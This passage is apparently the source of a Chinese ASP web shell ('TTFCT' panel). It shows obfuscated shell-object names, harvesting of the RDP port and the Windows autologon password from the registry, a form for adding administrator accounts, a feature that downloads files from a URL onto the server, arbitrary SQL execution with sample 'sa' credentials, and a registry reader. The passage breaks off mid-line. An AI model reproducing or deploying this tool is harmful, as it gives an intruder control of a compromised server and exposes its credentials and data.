echo "<hr/><input type=submit name=newAct value=' 修改 '>" & strJsCloseMe
echo "</form>"
  End Sub

  Function getMyTitle(theOne)
If isDebugMode = False Then
   On Error Resume Next
End If
Dim strTitle
strTitle = strTitle & "路径: " & theOne.Path & "" & vbNewLine
strTitle = strTitle & "大小: " & getTheSize(theOne.Size) & vbNewLine
strTitle = strTitle & "属性: " & getAttributes(theOne.Attributes) & vbNewLine
strTitle = strTitle & "创建时间: " & theOne.DateCreated & vbNewLine
strTitle = strTitle & "最后修改: " & theOne.DateLastModified & vbNewLine
strTitle = strTitle & "最后访问: " & theOne.DateLastAccessed
getMyTitle = strTitle
  End Function

  Sub setMyTitle(theOne)
Dim i, myAttributes

For i = 1 To Request("attributes").Count
   myAttributes = myAttributes + CInt(Request("attributes")(i))
Next
theOne.Attributes = myAttributes

chkErr(Err)
echo  "<script>alert('该文件(夹)属性已按正确设置修改完成!');</script>"
  End Sub

  Function getAttributes(intValue)
Dim strAtt
strAtt = "<input type=checkbox name=attributes value=4 {$system}>系统 "
strAtt = strAtt & "<input type=checkbox name=attributes value=2 {$hidden}>隐藏 "
strAtt = strAtt & "<input type=checkbox name=attributes value=1 {$readonly}>只读  "
strAtt = strAtt & "<input type=checkbox name=attributes value=32 {$archive}>存档<br/>　　  "
strAtt = strAtt & "<input type=checkbox name=attributes {$normal} value=0>普通 "
strAtt = strAtt & "<input type=checkbox name=attributes value=128 {$compressed}>压缩 "
strAtt = strAtt & "<input type=checkbox name=attributes value=16 {$directory}>文件夹 "
strAtt = strAtt & "<input type=checkbox name=attributes value=64 {$alias}>快捷方式"
' strAtt = strAtt & "<input type=checkbox name=attributes value=8 {$volume}>卷标 "
If intValue = 0 Then
   strAtt = Replace(strAtt, "{$normal}", "checked")
End If
If intValue >= 128 Then
   intValue = intValue - 128
   strAtt = Replace(strAtt, "{$compressed}", "checked")
End If
If intValue >= 64 Then
   intValue = intValue - 64
   strAtt = Replace(strAtt, "{$alias}", "checked")
End If
If intValue >= 32 Then
   intValue = intValue - 32
   strAtt = Replace(strAtt, "{$archive}", "checked")
End If
If intValue >= 16 Then
   intValue = intValue - 16
   strAtt = Replace(strAtt, "{$directory}", "checked")
End If
If intValue >= 8 Then
   intValue = intValue - 8
   strAtt = Replace(strAtt, "{$volume}", "checked")
End If
If intValue >= 4 Then
   intValue = intValue - 4
   strAtt = Replace(strAtt, "{$system}", "checked")
End If
If intValue >= 2 Then
   intValue = intValue - 2
   strAtt = Replace(strAtt, "{$hidden}", "checked")
End If
If intValue >= 1 Then
   intValue = intValue - 1
   strAtt = Replace(strAtt, "{$readonly}", "checked")
End If
getAttributes = strAtt
  End Function

  Sub PageInfoAboutSrv()
Dim theAct
theAct = Request("theAct")

showTitle("服务器相关数据")

Select Case theAct
   Case ""
      getSrvInfo()
      getSrvDrvInfo()
      getSiteRootInfo()
      getTerminalInfo()
   Case "getSrvInfo"
      getSrvInfo()
   Case "getSrvDrvInfo"
      getSrvDrvInfo()
   Case "getSiteRootInfo"
      getSiteRootInfo()
   Case "getTerminalInfo"
      getTerminalInfo()
End Select

echo "<hr/>"
  End Sub

  Sub getSrvInfo()
If isDebugMode = False Then
   On Error Resume Next
End If
Dim i, sa, objWshSysEnv, aryExEnvList, strExEnvList, intCpuNum, strCpuInfo, strOS
Set sa = Server.CreateObject("She"&T&"ll.Appl"&T&"ication")
strExEnvList = "SystemRoot$WinDir$ComSpec$TEMP$TMP$NUMBER_OF_PROCESSORS$OS$Os2LibPath$Path$PATHEXT$PROCESSOR_ARCHITECTURE$" & _
         "PROCESSOR_IDENTIFIER$PROCESSOR_LEVEL$PROCESSOR_REVISION"
aryExEnvList = Split(strExEnvList, "$")

Set objWshSysEnv = wsX.Environment("SYSTEM")
chkErr(Err)

intCpuNum = Request.ServerVariables("NUMBER_OF_PROCESSORS")
If IsNull(intCpuNum) Or intCpuNum = "" Then
   intCpuNum = objWshSysEnv("NUMBER_OF_PROCESSORS")
End If
strOS = Request.ServerVariables("OS")
If IsNull(strOS) Or strOS = "" Then
   strOS = objWshSysEnv("OS")
   strOs = strOs & "(有可能是 Windows2003 哦)"
End If
strCpuInfo = objWshSysEnv("PROCESSOR_IDENTIFIER")

echo "<a href=javascript:showHideMe(srvInf);>服务器相关参数:</a>"
echo "<ol id=srvInf><hr/>"
echo "<li>服务器名: " & Request.ServerVariables("SERVER_NAME") & "</li>"
echo "<li>服务器IP: " & Request.ServerVariables("LOCAL_ADDR") & "</li>"
echo "<li>服务端口: " & Request.ServerVariables("SERVER_PORT") & "</li>"
echo "<li>服务器内存: " & getTheSize(sa.GetSystemInformation("PhysicalMemoryInstalled")) & "</li>"
echo "<li>服务器时间: " & Now & "</li>"
echo "<li>服务器软件: " & Request.ServerVariables("SERVER_SOFTWARE") & "</li>"
echo "<li>脚本超时时间: " & Server.ScriptTimeout & "</li>"
echo "<li>服务器CPU数量: " & intCpuNum & "</li>"
echo "<li>服务器CPU详情: " & strCpuInfo & "</li>"
echo "<li>服务器操作系统: " & strOS & "</li>"
echo "<li>服务器解译引擎: " & ScriptEngine & "/" & ScriptEngineMajorVersion & "." & ScriptEngineMinorVersion & "." & ScriptEngineBuildVersion & "</li>"
echo "<li>本文件实际路径: " & Request.ServerVariables("PATH_TRANzxzgcnATED") & "</li>"
echo "<hr/></ol>"

echo "<br/><a href=javascript:showHideMe(srvEnvInf);>服务器相关参数:</a>"
echo "<ol id=srvEnvInf><hr/>"
For i = 0 To UBound(aryExEnvList)
   echo "<li>" & aryExEnvList(i) & ": " & wsX.ExpandEnvironmentStrings("%" & aryExEnvList(i) & "%") & "</li>"
Next
echo "<hr/></ol>"

Set sa = Nothing
Set objWshSysEnv = Nothing
  End Sub

  Sub getSrvDrvInfo()
If isDebugMode = False Then
   On Error Resume Next
End If
Dim objTheDrive
echo "<br/><a href=javascript:showHideMe(srvDriveInf);>服务器磁盘信息:</a>"
echo "<ol id=srvDriveInf><hr/>"
echo "<div id='fsoDriveList'>"
echo "<span>盘符</span><span>类型</span><span>卷标</span><span>文件系统</span><span>可用空间</span><span>总空间</span><br/>"
For Each objTheDrive In fsoX.Drives
   echo "<span>" & objTheDrive.DriveLetter & "</span>"
   echo "<span>" & getDriveType(objTheDrive.DriveType) & "</span>"
   If UCase(objTheDrive.DriveLetter) = "A" Then
      echo "<br/>"
   Else
      echo "<span>" & objTheDrive.VolumeName & "</span>"
      echo "<span>" & objTheDrive.FileSystem & "</span>"
      echo "<span>" & getTheSize(objTheDrive.FreeSpace) & "</span>"
      echo "<span>" & getTheSize(objTheDrive.TotalSize) & "</span><br/>"
   End If
   If Err Then
      Err.Clear
      echo "<br/>"
   End If
Next
echo "</div><hr/></ol>"
Set objTheDrive = Nothing
  End Sub

  Sub getSiteRootInfo()
If isDebugMode = False Then
   On Error Resume Next
End If
Dim objTheFolder
Set objTheFolder = fsoX.GetFolder(Server.MapPath("/"))
echo "<br/><a href=javascript:showHideMe(siteRootInfo);>站点根目录信息:</a>"
echo "<ol id=siteRootInfo><hr/>"
echo "<li>物理路径: " & Server.MapPath("/") & "</li>"
echo "<li>当前大小: " & getTheSize(objTheFolder.Size) & "</li>"
echo "<li>文件数: " & objTheFolder.Files.Count & "</li>"
echo "<li>文件夹数: " & objTheFolder.SubFolders.Count & "</li>"
echo "<li>创建日期: " & objTheFolder.DateCreated & "</li>"
echo "<li>最后访问日期: " & objTheFolder.DateLastAccessed & "</li>"
echo "</ol>"
  End Sub

  Sub getTerminalInfo()
If isDebugMode = False Then
   On Error Resume Next
End If
Dim terminalPortPath, terminalPortKey, termPort
Dim autoLoginPath, autoLoginUserKey, autoLoginPassKey
Dim isAutoLoginEnable, autoLoginEnableKey, autoLoginUsername, autoLoginPassword

terminalPortPath = "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\"
terminalPortKey = "PortNumber"
termPort = wsX.RegRead(terminalPortPath & terminalPortKey)

echo "终端服务端口及自动登录信息<hr/><ol>"
If termPort = "" Or Err.Number <> 0 Then
   echo  "无法得到终端服务端口, 请检查权限是否已经受到限制.<br/>"
   Else
   echo  "当前终端服务端口: " & termPort & "<br/>"
End If

autoLoginPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\"
autoLoginEnableKey = "AutoAdminLogon"
autoLoginUserKey = "DefaultUserName"
autoLoginPassKey = "DefaultPassword"
isAutoLoginEnable = wsX.RegRead(autoLoginPath & autoLoginEnableKey)
If isAutoLoginEnable = 0 Then
   echo  "系统自动登录功能未开启<br/>"
Else
   autoLoginUsername = wsX.RegRead(autoLoginPath & autoLoginUserKey)
   echo  "自动登录的系统帐户: " & autoLoginUsername & "<br>"
   autoLoginPassword = wsX.RegRead(autoLoginPath & autoLoginPassKey)
   If Err Then
      Err.Clear
      echo  "False"
   End If
   echo  "自动登录的帐户密码: " & autoLoginPassword & "<br>"
End If
echo "</ol>"
  End Sub

  Sub PageLogin()
Dim theAct, passWord
theAct = Request("theAct")
passWord = Request("userPassword")

showTitle("管理登录")

If theAct = "chkLogin" Then
   If passWord = userPassword Then
      Session(m & "userPassword") = passWord
      redirectTo("?zxzgcn=PageList")
   Else
      echo "<script language=javascript>alert('不要乱来哦');history.back();</script>"
   End If
End If

echo "<style>body{margin:8;text-align:center;}</style>"
echo "TTFCT全功能版<hr/>"
echo "<body onload=document.forms[0].userPassword.focus();>"
echo "<form method=post onsubmit=this.Submit.disabled=true;>"
echo "<input name=userPassword class=input type=password size=30> "
echo "<input type=hidden name=theAct value=chkLogin>"
echo "<input type=submit name=Submit value=""" & HtmlEncode(myName) & """ class=input>"
echo "<hr/>"
echo "<SCRIPT type='text/javascript' language='javascript' src='http://xzxzgcnt.alexa.com/site_stats/js/t/c?url='></SCRIPT>"
         echo "</form>"
echo "<body>"

  End Sub

  Sub pageMsDataBase()
Dim theAct, sqlStr
theAct = Request("theAct")
sqlStr = Request("sqlStr")

showTitle("mdb+mssql数据库操作页")

If sqlStr = "" Then
   If Session(m & "sqlStr") = "" Then
      sqlStr = "e:\zxzgcnTop.mdb或sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs;"
   Else
      sqlStr = Session(m & "sqlStr")
   End If
End If
Session(m & "sqlStr") = sqlStr

echo "<style>body{margin:8;}</style>"
echo "<form method=post action='?zxzgcn=MsDataBase&theAct=showTables' onSubmit='this.Submit.disabled=true;'>"
echo "<a href='?zxzgcn=MsDataBase'>mdb+mssql数据库操作</a><br/>"
echo "<input name=sqlStr type=text id=sqlStr value=""" & sqlStr & """ size=60 style='width:80%;'>"
echo "<input name=theAct type=hidden value=showTables><br/>"
echo "<input type=Submit name=Submit value=' 提交 '>"
echo "<input type=button name=Submit2 value=' 插入 ' onclick=""if(confirm('这里是在ACESS数据里插入ASP\n默认密码是" & clientPassword & "\n插入后可以使用的前提是\n数据库是asp后缀, 并且没有错乱asp代码\n确认操作吗?')){location.href='?zxzgcn=MsDataBase&theAct=inject&sqlStr='+this.form.sqlStr.value;this.disabled=true;}"">"
echo "<input type=button value=' 示例 ' onclick=""this.form.sqlStr.value='e:\\zxzgcnTop.mdb或sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs;';"">"
echo "</form>"
echo "<hr/>注: 插入只针对ACCESS操作, 要浏览ACCESS在表单中的写法是""d:\bbs.mdb"", SQL据库写法是""sql:连接字符串"", 不要忘写sql:。<hr/>"

Select Case theAct
   Case "showTables"
      showTables()
   Case "query"
      showQuery()
   Case "inject"
      accessInject()
End Select

echo ""
  End Sub

  Sub showTables()
If isDebugMode = False Then
   On Error Resume Next
End If
Dim conn, sqlStr, rsTable, rsColumn, connStr, tablesStr
sqlStr = Request("sqlStr")
If LCase(Left(sqlStr, 4)) = "sql:" Then
   connStr = Mid(sqlStr, 5)
   Else
   connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
End If
Set conn = Server.CreateObject("ADO"&T&"DB.Conne"&T&"ction")

conn.Open connStr
chkErr(Err)

tablesStr = getTableList(conn, sqlStr, rsTable)

echo "<a href=""?zxzgcn=MsDataBase&theAct=showTables&sqlStr=" & UrlEncode(sqlStr)  & """>数据库表结构查看:</a><br/>"
echo tablesStr & "<hr/>"
echo "<a href=""?zxzgcn=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & """>转到SQL命令执行</a><hr/>"

Do Until rsTable.Eof
   Set rsColumn = conn.OpenSchema(4, Array(Empty, Empty, rsTable("Table_Name").value))
   echo "<table border=0 cellpadding=0 cellspacing=0><tr><td height=22 colspan=6><b>" & rsTable("Table_Name") & "</b></td>"
   echo "</tr><tr><td colspan=6><hr/></td></tr><tr align=center>"
   echo "<td>字段名</td><td>类型</td><td>大小</td><td>精度</td><td>允许为空</td><td>默认值</td></tr>"
   echo "<tr><td colspan=6><hr/></td></tr>"

   Do Until rsColumn.Eof
      echo "<tr align=center>"
      echo "<td align=Left> " & rsColumn("Column_Name") & "</td>"
      echo "<td width=80>" & getDataType(rsColumn("Data_Type")) & "</td>"
      echo "<td width=70>" & rsColumn("Character_Maximum_Length") & "</td>"
      echo "<td width=70>" & rsColumn("Numeric_Precision") & "</td>"
      echo "<td width=70>" & rsColumn("Is_Nullable") & "</td>"
      echo "<td width=80>" & rsColumn("Column_Default") & "</td>"
      echo "</tr>"
      rsColumn.MoveNext
   Loop

   echo "<tr><td colspan=6><hr/></td></tr></table>"
   rsTable.MoveNext
Loop

echo "<hr/>"

conn.Close
Set conn = Nothing
Set rsTable = Nothing
Set rsColumn = Nothing
  End Sub

  Sub showQuery()
If isDebugMode = False Then
   On Error Resume Next
End If
Dim i, j, rs, sql, page, conn, sqlStr, connStr, rsTable, tablesStr, theTable
sql = Request("sql")
page = Request("page")
sqlStr = Request("sqlStr")
theTable = Request("theTable")

If Not IsNumeric(page) or page = "" Then
   page = 1
End If

If sql = "" And theTable <> "" Then
   sql = "Select top " & dbSelectNumber & " * from [" & theTable & "]"
End If

If LCase(Left(sqlStr, 4)) = "sql:" Then
   connStr = Mid(sqlStr, 5)
   Else
   connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
End If
Set rs = Server.CreateObject("Adodb.RecordSet")
Set conn = Server.CreateObject("ADO"&T&"DB.Conne"&T&"ction")

conn.Open connStr
chkErr(Err)

tablesStr = getTableList(conn, sqlStr, rsTable)

echo "<a href=""?zxzgcn=MsDataBase&theAct=showTables&sqlStr=" & UrlEncode(sqlStr)  & """>数据库表结构查看:</a><br/>"
echo tablesStr & "<hr/>"
echo "<a href=?zxzgcn=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & "&sql=" & UrlEncode(sql) & ">SQL命令执行及查看</a>"
echo "<br/><form method=post action=""?zxzgcn=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & """>"
echo "<input name=sql type=text id=sql value=""" & HtmlEncode(sql) & """ size=60>"
echo "<input type=Submit name=Submit4 value=执行查询><hr/>"

If sql <> "" And Left(LCase(sql), 7) = "select " Then
   rs.Open sql, conn, 1, 1
   chkErr(Err)
   rs.PageSize = 20
   If Not rs.Eof Then
      rs.AbsolutePage = page
   End If
   If rs.Fields.Count>0 Then
      echo "<br><table border=""1"" cellpadding=""0"" cellspacing=""0"" width=""98%"">"
      echo "<tr>"
      echo "<td height=""22"" align=""center"" class=""tr"" colspan=""" & rs.Fields.Count & """>SQL操作 - 执行结果</td>"
      echo "</tr>"
      echo "<tr>"
      For j = 0 To rs.Fields.Count-1
      echo "<td height=""22"" align=""center"" class=""td""> " & rs.Fields(j).Name & " </td>"
      Next
      For i = 1 To 20
      If rs.Eof Then
         Exit For
      End If
      echo "</tr>"
      echo "<tr valign=top>"
      For j = 0 To rs.Fields.Count-1
         echo "<td height=""22"" align=""center"">" & HtmlEncode(fixNull(rs(j))) & "</td>"
      Next
      echo "</tr>"
      rs.MoveNext
      Next
   End If
   echo "<tr>"
   echo "<td height=""22"" align=""center"" class=""td"" colspan=""" & rs.Fields.Count & """>"
   For i = 1 To rs.PageCount
      echo Replace("<a href=""?zxzgcn=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & "&sql=" & UrlEncode(sql) & "&page=" & i & """><font {$font" & i & "}>" & i & "</font></a> ", "{$font" & page & "}", "class=warningColor")
   Next
   echo "</td></tr></table>"
   rs.Close
   Else
   If sql <> "" Then
      conn.Execute(sql)
      chkErr(Err)
      echo "<center><br>执行完毕!</center>"
   End If
End If

echo "</form><hr/>"

conn.Close
Set rs = Nothing
Set conn = Nothing
Set rsTable = Nothing
  End Sub

  Function getDataType(typeId)
Select Case typeId
   Case 130
      getDataType = "文本"
   Case 2
      getDataType = "整型"
   Case 3
      getDataType = "长整型"
   Case 7
      getDataType = "日期/时间"
   Case 5
      getDataType = "双精度型"
   Case 11
      getDataType = "是/否"
   Case 128
      getDataType = "OLE 对象"
   Case Else
      getDataType = typeId
End Select
  End Function

  Sub accessInject()
echo "<script language=""javascript"">alert('not available');history.back();</script>"

Set conn = Nothing
  End Sub

  Function getTableList(conn, sqlStr, rsTable)
Set rsTable = conn.OpenSchema(20, Array(Empty, Empty, Empty, "table"))

Do Until rsTable.Eof
   getTableList = getTableList & "<a href=""?zxzgcn=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & "&theTable=" & UrlEncode(rsTable("Table_Name")) & """>[" & rsTable("Table_Name") & "]</a> "
   rsTable.MoveNext
Loop
rsTable.MoveFirst
  End Function

  Sub PageObjOnSrv()
Dim i, objTmp, txtObjInfo, strObjectList, strDscList
txtObjInfo = Trim(Request("txtObjInfo"))

strObjectList = "MSWC.AdRotator,MSWC.BrowserType,MSWC.NextLink,MSWC.Tools,MSWC.Status,MSWC.Counters,IISSample.ContentRotator," & _
         "IISSample.PageCounter,MSWC.PermissionChecker,ADO"&T&"DB.Conne"&T&"ction,SoftArtisans.FileUp,SoftArtisans.FileManager,LyfUpload.UploadFile," & _
         "Persits.Upload.1,W3.Upload,JMail.SmtpMail,CDONTS.NewMail,Persits.MailSender,SMTPsvg.Mailer,DkQmail.Qmail,Geocel.Mailer," & _
         "IISmail.Iismail.1,SmtpMail.SmtpMail.1,SoftArtisans.ImageGen,W3Image.Image," & _
         "Scripting.FileSystemObject,ad"&e&"odb.st"&e&"ream,She"&T&"ll.Appl"&T&"ication,WScri"&T&"pt.She"&T&"ll,Wscript.Network"
strDscList = "广告轮换,浏览器信息,内容链接库,,,计数器,内容轮显,,权限检测,ADO 数据对象,SA-FileUp 文件上传,SoftArtisans 文件管理," & _
         "刘云峰的文件上传组件,ASPUpload 文件上传,Dimac 文件上传,Dimac JMail 邮件收发,虚拟 SMTP 发信,ASPemail 发信,ASPmail 发信,dkQmail 发信," & _
         "Geocel 发信,IISmail 发信,SmtpMail 发信,SA 的图像读写,Dimac 的图像读写组件," & _
         "FSO,Stream 流,,,"

aryObjectList = Split(strObjectList, ",")
aryDscList = Split(strDscList, ",")

showTitle("服务器组件支持情况检测")

echo "其他组件支持情况检测<br/>"
echo "在下面的输入框中输入你要检测的组件的ProgId或ClassId。<br/>"
echo "<form method=post>"
echo "<input name=txtObjInfo size=30 value=""" & txtObjInfo & """><input name=theAct type=submit value=我要检测>"
echo "</form>"

If Request("theAct") = "我要检测" And txtObjInfo <> "" Then
   Call getObjInfo(txtObjInfo, "")
End If

echo "<hr/>"
echo "<lu>组件名称 ┆ 支持及其它"

For i = 0 To UBound(aryDscList)
   Call getObjInfo(aryObjectList(i), aryDscList(i))
Next

echo "</lu><hr/>"
  End Sub

  Sub getObjInfo(strObjInfo, strDscInfo)
Dim objTmp

If isDebugMode = False Then
   On Error Resume Next
End If

echo "<li> " & strObjInfo
If strDscInfo <> "" Then
   echo " (" & strDscInfo & "组件)"
End If

echo " ┆ "

Set objTmp = Server.CreateObject(strObjInfo)
If Err <> -2147221005 Then
   echo "√ "
   echo "Version: " & objTmp.Version & "; "
   echo "About: " & objTmp.About
   Else
   echo "×"
End If
echo "</li>"

If Err Then
   Err.Clear
End If

Set objTmp = Nothing
  End Sub

  Sub PageOtherTools()
Dim theAct
theAct = Request("theAct")

showTitle("一些零碎的小东西")

Select Case theAct
   Case "downFromUrl"
      downFromUrl()
      Response.End
   Case "addUser"
      AddUser Request("userName"), Request("passWord")
      Response.End
   Case "readReg"
      readReg()
      Response.End
End Select

echo "数制转换:<hr/>"
echo "<input name=text1 value=字符和数字转10和16进制 size=25 id=text9>"
echo "<input type=button onclick=main(); value=给我转>"
echo "<input value=16进制转10进制和字符 size=25 id=vars>"
echo "<input type=button onClick=main2(); value=给我转>"
echo "<hr/>"

echo "下载到服务器:<hr/>"
echo "<form method=post target=_blank>"
echo "<input name=theUrl value='http://' size=80><input type=submit value=' 下载 '><br/>"
echo "<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=80>"
echo "<input type=checkbox name=overWrite value=2>存在覆盖"
echo "<input type=hidden value=downFromUrl name=theAct>"
echo "</form>"
echo "<hr/>"

echo "文件编辑:<hr/>"
echo "<form method=post action='?' target=_blank>"
echo "<input size=80 name=thePath value=""" & HtmlEncode(Request.ServerVariables("PATH_TRANzxzgcnATED")) & """>"
echo "<input type=hidden value=showEdit name=theAct>"
echo "<select name=zxzgcn><option value=AppFileExplorer>用Stream</option><option value=FsoFileExplorer>用FSO</option></select>"
echo "<input type=submit value=' 打开 '>"
echo "</form><hr/>"

echo "管理帐号添加(成功率极低):<hr/>"
echo "<form method=post target=_blank>"
echo "<input type=hidden value=addUser name=theAct>"
echo "<input name=userName value='zxzgcnTop' size=39>"
echo "<input name=passWord type=password value='zxzgcnTop' size=39>"
echo "<input type=submit value=' 添加 '>"
echo "</form><hr/>"

echo "注册表键值读取(<a href=javascript:showHideMe(regeditInfo);>资料</a>):<hr/>"
echo "<form method=post target=_blank>"
echo "<input type=hidden value=readReg name=theAct>"
echo "<input name=thePath value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName' size=80>"
echo "<input type=submit value=' 读取 '>"
echo "<span id=regeditInfo style='display:none;'><hr/>"
echo "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\Dont-DisplayLastUserName,REG_SZ,1 {不显示上次登录用户}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous,REG_DWORD,0 {0=缺省,1=匿名用户无法列举本机用户列表,2=匿名用户无法连接本机IPC$共享}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\AutoShareServer,REG_DWORD,0 {禁止默认共享}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\EnableSharedNetDrives,REG_SZ,0 {关闭网�